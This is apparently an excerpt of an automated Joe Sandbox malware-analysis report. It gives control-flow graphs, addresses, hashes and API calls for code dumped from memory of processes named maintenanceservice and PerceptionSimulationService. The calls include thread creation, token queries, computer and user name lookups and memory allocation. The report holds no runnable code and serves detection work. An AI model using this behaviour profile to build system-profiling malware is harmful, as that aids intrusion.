                                        control_flow_graph 410 cd5b87-cd5d01 CreateThread 414 cd5bb4 410->414 415 cd5d07 410->415 416 cd5cda-cd5ce4 CreateThread 414->416 417 cd5c01-cd5c05 CloseHandle 414->417 415->414 418 cd5d0d 415->418 416->417 421 cd5cea 416->421 422 cd5d37-cd5d41 417->422 421->417 423 cd5cf0-cd5cf6 421->423 424 cd5d4b-cd5d52 422->424 425 cd5d43 422->425 427 cd5d45-cd5d47 424->427 428 cd5d54 424->428 425->428 429 cd5d5f 427->429 430 cd5d49 427->430 432 cd5d65 429->432 430->424 430->429 432->432
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 29308cba0010ff05afc7eb91fde416d709ba18a99fdddfe3cec8188e793709ad
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: 99E0863061DB444FDB599B2458107297AE5EB88314F1501CFC54ADB2D1CB790A054782
                                        Function 00CD599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 433 cd599b-cd599e 434 cd59b8 call cf0df0 433->434 435 cd59f7 433->435 439 cd59bd-cd59c2 call cd5d90 434->439 436 cd5a02 435->436 440 cd597d 436->440 441 cd59d4 436->441 446 cd59c7-cd59ce 439->446 440->441 445 cd597f-cd5981 440->445 443 cd59d8 441->443 444 cd593b-cd5a15 call cf11a0 441->444 451 cd59d9-cd59de call d02190 443->451 448 cd5983-cd5a38 445->448 449 cd5a1a-cd5a26 446->449 450 cd59d0 446->450 460 cd5a3e 448->460 461 cd5994-cd599c 448->461 453 cd5a2c-cd5a34 449->453 454 cd59a1-cd59b5 call cd5e10 449->454 450->449 456 cd59d2-cd59de 450->456 451->461 466 cd59e0 451->466 453->451 454->434 467 cd5a08-cd5a0b 454->467 456->461 456->466 460->453 461->436 463 cd599e 461->463 463->435 466->461 468 cd59e2-cd59ec 466->468 467->461 469 cd5a0d 467->469 470 cd59ee-cd59ef 468->470 471 cd5a62-cd5a6e 468->471 476 cd5991 469->476 477 cd5932 469->477 470->448 473 cd59f1 call d09970 470->473 474 cd5a75-cd5ab3 call cf1280 471->474 475 cd5a70 471->475 473->434 487 cd5abb-cd5ac9 474->487 488 cd5ab5 474->488 475->474 479 cd5a72 475->479 476->477 481 cd5993 476->481 479->474 481->461 490 cd5af2-cd5af5 487->490 488->487 489 cd5ab7-cd5ab9 488->489 489->487 494 cd5adb-cd5adc 490->494 495 cd5ad5 490->495 497 cd5a45-cd5a46 494->497 498 cd5ae2 494->498 495->494 496 cd5ad7-cd5ad9 495->496 496->494 498->497 499 cd5ae8 498->499 499->490
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: a3405fb1751612f1157b230ef9d6a781932da13e742da688a7d76786448759ab
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: DD01497090DF90CFD717DB1940613796652F754330F28015BA34ECB392C9344F02A752
                                        Function 00CD5BE2 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 500 cd5be2-cd5be5 501 cd5bfc-cd5c05 CloseHandle 500->501 502 cd5be7-cd5bef 500->502 509 cd5d37-cd5d41 501->509 503 cd5ca3 502->503 506 cd5ca8-cd5cb3 call cd5e10 503->506 507 cd5ca5 503->507 514 cd5cb5 506->514 515 cd5d26 506->515 507->506 510 cd5ca7 507->510 512 cd5d4b-cd5d52 509->512 513 cd5d43 509->513 510->509 516 cd5d45-cd5d47 512->516 517 cd5d54 512->517 513->517 514->515 518 cd5cb7 514->518 519 cd5d27-cd5d2a call cd5910 515->519 520 cd5d5f 516->520 521 cd5d49 516->521 522 cd5d5b-cd5d5d 518->522 526 cd5d2e 519->526 525 cd5d65 520->525 521->512 521->520 522->520 525->525 526->522
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: 273c12efb8a9d9102b61a152daf859df7a1764666b7d766df5e999b35a9350ed
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: 51E02B35528F0ADFEBA4A61ACA4967532C1D77C3E032405238B03C7310E454CF066722
                                        Function 00CD8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 527 cd8090-cd8096 528 cd8184 527->528 529 cd818c-cd8192 528->529 530 cd8186 CloseHandle 528->530 531 cd8115-cd8118 529->531 532 cd8194 529->532 530->529 533 cd8119-cd811a 531->533 534 cd80a7 531->534 532->531 535 cd819a 532->535 533->534 536 cd811c 533->536 537 cd813c 535->537 538 cd820f 536->538 537->528 539 cd808e-cd8096 538->539 540 cd8215-cd821e 538->540 539->528 539->534 540->539 542 cd8224 540->542 543 cd81d7-cd81e6 call d0715c 542->543 544 cd8226 542->544 553 cd8089 543->553 554 cd80ca-cd810f GetTokenInformation 543->554 544->543 545 cd8228-cd82ee call cd5d90 544->545 558 cd830c-cd831e 545->558 559 cd82f0 545->559 553->554 557 cd808b 553->557 562 cd812d 554->562 563 cd8111 554->563 570 cd808c 557->570 560 cd82a1-cd82ba call cd5d90 call cdec00 558->560 561 cd8320 558->561 559->558 564 cd82f2 559->564 560->561 568 cd82f7-cd82fc call cd5d90 561->568 569 cd8322 561->569 566 cd80a8 562->566 567 cd8133 562->567 563->562 571 cd8113 563->571 564->568 576 cd80aa-cd80ad 566->576 567->537 574 cd81ed-cd81f0 567->574 586 cd8253-cd8265 call cf1280 568->586 587 cd8302 568->587 569->568 575 cd8324-cd8326 569->575 570->539 571->531 580 cd80da-cd80f1 574->580 581 cd81f6 574->581 579 cd8328 575->579 582 cd8163-cd8170 call d07164 576->582 583 cd80b3-cd8203 576->583 596 cd82df-cd832b 579->596 597 cd8335 579->597 580->576 581->580 584 cd81fc 581->584 582->530 603 cd8172 582->603 583->582 594 cd8209 583->594 592 cd81fe-cd8201 GetTokenInformation 584->592 586->579 606 cd826b 586->606 587->586 593 cd8308-cd830a 587->593 592->538 612 cd81b7 592->612 593->558 596->597 609 cd832d-cd8331 596->609 600 cd826e-cd8285 597->600 604 cd829b-cd829d 600->604 605 cd8287 600->605 603->529 604->560 610 cd824c 605->610 606->600 611 cd8239 606->611 609->597 610->604 615 cd824e-cd8252 610->615 611->579 614 cd823f-cd8243 611->614 612->538 613 cd81b9-cd81ca 612->613 618 cd81d0 613->618 619 cd80f3 613->619 614->568 614->610 615->600 618->592 624 cd80c3 618->624 619->570 620 cd80f5 619->620 620->570 625 cd8077 620->625 624->592 626 cd80c9 624->626 625->543 626->554
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 777a05c7c737e50f6aa2a78cc3b4d2c1d03c3fc73b8594db4e3364e53eb5af10
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 42C08C6012CC02B7523802490C0B0FC66209202790B4C00078F2A80320DD048F0F0097
                                        Function 00CD817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 627 cd817f 628 cd8184 627->628 629 cd818c-cd8192 628->629 630 cd8186 CloseHandle 628->630 631 cd8115-cd8118 629->631 632 cd8194 629->632 630->629 633 cd8119-cd811a 631->633 634 cd80a7 631->634 632->631 635 cd819a 632->635 633->634 636 cd811c 633->636 637 cd813c 635->637 638 cd820f 636->638 637->628 639 cd808e-cd8096 638->639 640 cd8215-cd821e 638->640 639->628 639->634 640->639 642 cd8224 640->642 643 cd81d7-cd81e6 call d0715c 642->643 644 cd8226 642->644 653 cd8089 643->653 654 cd80ca-cd810f GetTokenInformation 643->654 644->643 645 cd8228-cd82ee call cd5d90 644->645 658 cd830c-cd831e 645->658 659 cd82f0 645->659 653->654 657 cd808b 653->657 662 cd812d 654->662 663 cd8111 654->663 670 cd808c 657->670 660 cd82a1-cd82ba call cd5d90 call cdec00 658->660 661 cd8320 658->661 659->658 664 cd82f2 659->664 660->661 668 cd82f7-cd82fc call cd5d90 661->668 669 cd8322 661->669 666 cd80a8 662->666 667 cd8133 662->667 663->662 671 cd8113 663->671 664->668 676 cd80aa-cd80ad 666->676 667->637 674 cd81ed-cd81f0 667->674 686 cd8253-cd8265 call cf1280 668->686 687 cd8302 668->687 669->668 675 cd8324-cd8326 669->675 670->639 671->631 680 cd80da-cd80f1 674->680 681 cd81f6 674->681 679 cd8328 675->679 682 cd8163-cd8170 call d07164 676->682 683 cd80b3-cd8203 676->683 696 cd82df-cd832b 679->696 697 cd8335 679->697 680->676 681->680 684 cd81fc 681->684 682->630 703 cd8172 682->703 683->682 694 cd8209 683->694 692 cd81fe-cd8201 GetTokenInformation 684->692 686->679 706 cd826b 686->706 687->686 693 cd8308-cd830a 687->693 692->638 712 cd81b7 692->712 693->658 696->697 709 cd832d-cd8331 696->709 700 cd826e-cd8285 697->700 704 cd829b-cd829d 700->704 705 cd8287 700->705 703->629 704->660 710 cd824c 705->710 706->700 711 cd8239 706->711 709->697 710->704 715 cd824e-cd8252 710->715 711->679 714 cd823f-cd8243 711->714 712->638 713 cd81b9-cd81ca 712->713 718 cd81d0 713->718 719 cd80f3 713->719 714->668 714->710 715->700 718->692 724 cd80c3 718->724 719->670 720 cd80f5 719->720 720->670 725 cd8077 720->725 724->692 726 cd80c9 724->726 725->643 726->654
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: 3dc8fd7770f5edc2f34371dde0228f5563fc9f541b929d54e364e8c3a231475e
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: ECC092A055C909A7513826892C0A0BD75605613BA0F0C4513EF2A8A360DD584F4F41A2

                                        Execution Graph

                                        Execution Coverage:4.2%
                                        Dynamic/Decrypted Code Coverage:97.6%
                                        Signature Coverage:0%
                                        Total number of Nodes:84
                                        Total number of Limit Nodes:1
                                        execution_graph 5689 548090 5693 548075 5689->5693 5690 548186 CloseHandle 5690->5693 5691 5480ca GetTokenInformation 5691->5693 5692 5481ad GetTokenInformation 5692->5693 5693->5690 5693->5691 5693->5692 5694 5480a7 5693->5694 5728 5457f0 5731 5455ac 5728->5731 5729 5455e4 5731->5728 5731->5729 5732 563870 5731->5732 5733 563876 5732->5733 5735 563893 5733->5735 5736 563720 5733->5736 5735->5731 5739 550c42 5736->5739 5737 5637dd 5737->5735 5738 54e050 VirtualAlloc 5738->5739 5739->5736 5739->5737 5739->5738 5669 5481b1 5673 548075 5669->5673 5670 548186 CloseHandle 5670->5673 5671 5480ca GetTokenInformation 5671->5673 5672 5481ad GetTokenInformation 5672->5673 5673->5670 5673->5671 5673->5672 5674 5480a7 5673->5674 5629 545b87 CreateThread 5630 545b1c 5629->5630 5637 545810 5629->5637 5631 545cdf CreateThread 5630->5631 5634 545c20 5630->5634 5632 545c01 5631->5632 5635 5454a0 5631->5635 5633 545c03 CloseHandle 5632->5633 5632->5634 5633->5634 5636 5454b5 5635->5636 5638 545822 5637->5638 5639 545b00 5640 545bba 5639->5640 5647 5552c0 5640->5647 5642 545bc7 5646 545bde 5642->5646 5652 560080 5642->5652 5648 5552c6 5647->5648 5651 5552ce 5647->5651 5648->5651 5666 54e050 5648->5666 5651->5642 5657 560089 5652->5657 5653 5603e0 GetComputerNameW 5653->5657 5654 560181 VirtualFree 5654->5657 5655 54e050 VirtualAlloc 5655->5657 5656 5603bf GetUserNameW 5656->5657 5657->5653 5657->5654 5657->5655 5657->5656 5658 5604d6 GetComputerNameW 5657->5658 5659 545c7b 5657->5659 5658->5657 5660 548070 5659->5660 5664 548075 5660->5664 5661 548186 CloseHandle 5661->5664 5662 5480ca GetTokenInformation 5662->5664 5663 5481ad GetTokenInformation 5663->5664 5664->5661 5664->5662 5664->5663 5665 5480a7 5664->5665 5665->5646 5667 54e0c3 5666->5667 5668 54e0d8 VirtualAlloc 5667->5668 5668->5667 5682 545860 5683 5552c0 VirtualAlloc 5682->5683 5684 545869 5683->5684 5685 560080 5 API calls 5684->5685 5686 54587d 5685->5686 5687 548070 3 API calls 5686->5687 5688 545870 5687->5688 5675 545b42 5676 545b07 5675->5676 5676->5675 5677 545cdf CreateThread 5676->5677 5680 545b68 5676->5680 5678 545c01 5677->5678 5681 5454a0 5677->5681 5679 545c03 CloseHandle 5678->5679 5678->5680 5679->5680 5740 545be2 5741 545bfc CloseHandle 5740->5741 5743 545be7 5740->5743 5741->5743 5743->5743 5744 5455ef 5746 5455ac 5744->5746 5745 563870 VirtualAlloc 5745->5746 5746->5745 5747 5455e4 5746->5747 5715 545b09 5716 545b16 5715->5716 5717 545cdf CreateThread 5716->5717 5720 545c20 5716->5720 5718 545c01 5717->5718 5721 5454a0 5717->5721 5719 545c03 CloseHandle 5718->5719 5718->5720 5719->5720

                                        Executed Functions

                                        Function 005452A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 315 5452a0-5453fe 320 545404-54540e 315->320 321 580d4c-580d4e 315->321 322 545424 320->322 323 54542a 322->323 324 54539b 322->324 323->324 327 545430-545443 323->327 325 545413-545419 324->325 326 54539d-5453a1 324->326 328 5453a7 326->328 329 5452b0-5452b5 326->329 328->329 330 5453ad 328->330 331 5453f3-5453f9 330->331 332 5453af 330->332 336 545355 331->336 337 54532a 331->337 333 5453e0-5453f1 332->333 333->325 333->331 341 5452d1-5452e7 336->341 342 5452e8-545363 336->342 337->336 338 54532c-54533f 337->338 340 54536b-545390 338->340 349 545392-54539a 340->349 350 5453c3 340->350 341->342 347 545365 342->347 348 5453d1-5453d5 342->348 347->348 352 545367-545369 347->352 348->326 351 5453d7 348->351 349->326 351->333 353 545342-545345 351->353 352->340 354 545400-54540e 353->354 355 54534b 353->355 354->322 355->354 356 545351-545353 355->356 356->336
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 005453C4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 927071a1aa7673c7b83d6b8e8428acd04324f3f3a2b659cde0c9f6f1af0bf8a3
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 1F41D67650DE954FD72A4E2444643F47FA0BB123EEF990CE7E4828A0E7F1D80C859326
                                        Function 00560080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 560080-560286 2 56028c 0->2 3 560099-560575 0->3 5 560445 2->5 7 560155 3->7 8 56057b 3->8 5->3 6 56044b-560457 5->6 10 560458-560472 GetComputerNameW 6->10 9 5602ef-560495 call 54e050 * 2 7->9 8->7 11 560581-560587 8->11 9->10 55 56043e 9->55 17 5603ee-5603f4 10->17 18 56024c-560253 10->18 12 56058b 11->12 15 560181 VirtualFree 12->15 16 56058c-560591 12->16 25 5601a8-5602ac call 577164 15->25 20 560597 16->20 21 5604ab-5604af 16->21 41 5600da-56023f 17->41 42 5603fa 17->42 22 5601e6 18->22 23 560255 18->23 20->21 26 56059d 20->26 46 5604c7 21->46 30 5602b1-5602be 22->30 31 5601ec-560313 call 57715c 22->31 27 5602d3 23->27 25->30 26->21 27->22 40 5602d9 27->40 37 5602c4 30->37 38 5603bf-5603d9 GetUserNameW 30->38 52 560318-56031e 31->52 37->38 48 5602ca 37->48 49 560331 38->49 40->9 41->18 50 560241-56024a 41->50 42->41 43 560400 42->43 51 56b1ee-56b49f 43->51 58 5604cc-5604e6 call 579970 GetComputerNameW 46->58 48->27 53 560337 49->53 54 560171 49->54 50->18 50->30 56 560324 52->56 57 560568-56056b 52->57 53->54 61 56033d 53->61 59 560173 54->59 60 56013f-560146 54->60 55->5 56->57 63 56032a 56->63 57->58 69 560131 58->69 70 5604ec-560514 58->70 65 560230 59->65 60->12 66 5605d0-5605d9 61->66 63->49 65->46 68 560236-5605c2 65->68 66->51 68->46 74 5605c8-5605c9 68->74 72 560137 69->72 73 560089-56008c 69->73 70->57 72->73 75 56013d 72->75 73->25 77 560092 73->77 74->66 75->15 75->60 77->25 78 560098 77->78 78->3
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction ID: 64214aa17436fdf41c190b058ea6c0bdb9a44f05f3b9fc491ea7c88488750e93
                                        • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                        • Instruction Fuzzy Hash: 8FD12331418B098BCB68EF58DC497EBBBD1FBA1310F585A1ED846C31A4DA749A45CAC2
                                        Function 00548070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 548070-54817e 81 548180 79->81 82 54813d-5481a5 79->82 81->82 85 548161 81->85 88 5481a7 82->88 89 5481bd-5481ca 82->89 87 548163-548170 call 577164 85->87 93 548186 CloseHandle 87->93 94 548172 87->94 95 5481d0 89->95 96 5480f3 89->96 97 54818c-548192 93->97 94->97 110 5480c3 95->110 111 5481fe-548201 GetTokenInformation 95->111 98 5480f5 96->98 99 54808c 96->99 101 548194 97->101 102 548115-548118 97->102 98->99 113 548077 98->113 104 54808e-548184 99->104 101->102 108 54819a 101->108 106 5480a7 102->106 107 548119-54811a 102->107 104->93 104->97 107->106 112 54811c 107->112 108->82 110->111 115 5480c9 110->115 116 54820f 111->116 123 5481b7 111->123 112->116 117 5481d7-5481de call 57715c 113->117 121 5480ca-5480d8 GetTokenInformation 115->121 116->104 119 548215-54821e 116->119 124 5481e3-5481e6 117->124 119->104 131 548224 119->131 125 54810f 121->125 123->116 126 5481b9-5481bb 123->126 124->121 139 548089 124->139 128 548111 125->128 129 54812d 125->129 126->89 128->129 132 548113 128->132 134 548133-5481f0 129->134 135 5480a8 129->135 131->117 137 548226 131->137 132->102 143 5481f6 134->143 144 5480da-5480f1 134->144 136 5480aa-5480ad 135->136 136->87 141 5480b3-548203 136->141 137->117 142 548228-5482ee call 545d90 137->142 139->121 140 54808b 139->140 140->99 141->87 148 548209 141->148 154 5482f0 142->154 155 54830c-548320 call 545d90 call 54ec00 142->155 143->144 147 5481fc 143->147 144->136 147->111 154->155 156 5482f2 154->156 158 5482f7-5482fc call 545d90 155->158 170 548322 155->170 156->158 164 548302 158->164 165 548253-548265 call 561280 158->165 164->165 167 548308-54830a 164->167 172 548328 165->172 173 54826b 165->173 167->155 170->158 174 548324-548326 170->174 178 548335 172->178 179 5482df-54832b 172->179 173->172 177 54823f-548243 173->177 174->172 177->158 182 548287 178->182 183 54829b-54829d 178->183 179->178 184 54832d-548331 179->184 182->183 186 54824e-548252 182->186 184->178 186->165
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction ID: b4d5920a73ca574d6ae552fbf0fe266f340490efb7d09a8b7945718d7bda02d0
                                        • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                        • Instruction Fuzzy Hash: DC615634A1CA859FC7698B2888183FE7FA0FB9535CF585A5BE40BC31A0DF645C49D352
                                        Function 00545B09 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 545b09-545d01 192 545bb4-545ce4 CreateThread 187->192 193 545d07 187->193 198 545c01-545c05 CloseHandle 192->198 199 545cea 192->199 193->192 195 545d0d 193->195 197 545d37-545d41 195->197 200 545d43 197->200 201 545d4b-545d52 197->201 198->197 206 545c20-545c68 198->206 199->198 203 545cf0-545cf6 199->203 204 545d54 200->204 201->204 205 545d45-545d47 201->205 203->206 207 545d5f 205->207 208 545d49 205->208 210 545d65 207->210 208->201 208->207 210->210
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: 365c26fd6ae7b30620fe51d5fb4879bfb29cc063778c06d4be93e4cf0e8383e8
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: AA01C03090DF4A8FDB5A56248C983F97F90FF5132CF2409AAC487CA093FA604E04A702
                                        Function 00545910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 211 545910-545968 213 545915-5459b8 call 579970 call 560df0 211->213 214 54596a 211->214 227 5459bd-5459c2 call 545d90 213->227 214->213 218 545931-55072c 214->218 221 550806-550809 218->221 222 550732-550738 218->222 229 55079d-5507a6 221->229 225 550800 222->225 226 55073e 222->226 225->221 228 5506b3-5506b7 225->228 226->225 230 550744-550774 226->230 234 5459c7-5459ce 227->234 228->229 233 5506bd 228->233 235 550791-550793 229->235 236 5507a8 229->236 238 5506d5-5506d9 230->238 239 55077a-55081c 230->239 233->229 240 5506c3-5507fe 233->240 241 5459d0 234->241 242 545a1a-545a26 call 545e10 234->242 243 5507ca-5507cc 235->243 236->235 237 5507aa 236->237 237->243 244 5506df 238->244 245 5506db 238->245 239->229 240->225 241->242 249 5459d2 241->249 261 545994-54599c 242->261 262 545a0d 242->262 244->229 245->244 251 5506dd 245->251 250 5459d4-545a15 call 5611a0 249->250 251->244 255 55c0cc 251->255 257 55c0ce-55c0d0 255->257 258 55c0e8-55c102 255->258 263 55c0d2-55c0df 257->263 258->263 265 55c104 258->265 267 545a02 261->267 268 54599e-5459f7 261->268 273 545991 262->273 274 545932 262->274 276 55c0e7 263->276 265->263 265->276 267->250 279 54597d 267->279 268->267 273->274 277 545993 273->277 278 5459e4-5459ec call 5721ac 274->278 277->261 285 545a62-545a6e 278->285 286 5459ed 278->286 279->250 281 54597f-545981 279->281 282 545983-545a38 281->282 282->261 287 545a3e call 572190 282->287 288 545a75-545ab3 call 561280 285->288 289 545a70 285->289 286->282 290 5459ee-5459ef 286->290 287->261 301 5459e0 287->301 303 545ab5 288->303 304 545abb-545ac9 288->304 289->288 291 545a72 289->291 290->282 294 5459f1 290->294 291->288 294->213 301->261 302 5459e2 301->302 302->278 303->304 305 545ab7-545ab9 303->305 306 545af2-545af5 304->306 305->304 309 545ad5 306->309 310 545adb-545adc 306->310 309->310 311 545ad7-545ad9 309->311 312 545a45-545a46 310->312 313 545ae2 310->313 311->310 313->312 314 545ae8 313->314 314->306
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: 6335a11eab77b8ec49bf549edb891a2ac7a89a609b4502f4fd064d9bba06117a
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 1FF1463071CE498FC669A72C58552B9BFD2FBD9314F58469FE44AC3297DD249C0AC382
                                        Function 00545B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 357 545b42-545b47 call 545d90 359 545b4c-545b52 357->359 361 545c42-545c62 call 561280 359->361 362 545b0d 359->362 380 545c14-545cc0 361->380 381 545c26 361->381 362->361 363 545b13 362->363 365 545c8f-545c96 363->365 367 545c98-545c9a 365->367 368 545c29 365->368 370 545c9c 367->370 371 545cc2-545cc9 call 5452a0 368->371 372 545c2f-545c36 368->372 378 545d0e-545d18 370->378 379 545bfa 370->379 382 545c69 371->382 383 545ccb 371->383 372->371 374 545c3c 372->374 374->357 385 545d54 378->385 386 545d1a 378->386 379->378 384 545c00 379->384 380->371 381->380 388 545c28 381->388 390 545c6f 382->390 391 545b68-545d75 382->391 383->370 389 545ccd 383->389 384->380 392 545d4b-545d52 386->392 388->368 389->370 393 545ccf-545ce4 CreateThread 389->393 390->391 395 545c75 390->395 392->385 396 545d45-545d47 392->396 400 545c01-545c05 CloseHandle 393->400 401 545cea 393->401 395->365 398 545d5f 396->398 399 545d49 396->399 404 545d65 398->404 399->392 399->398 405 545d37-545d41 400->405 406 545c20-545c68 400->406 401->400 403 545cf0-545cf6 401->403 403->406 404->404 405->392 407 545d43 405->407 407->385
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 6a451dcbb2178a8214b9300c39cb10af5ad5b84a0b0f7115b1d86a6fdb71f511
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
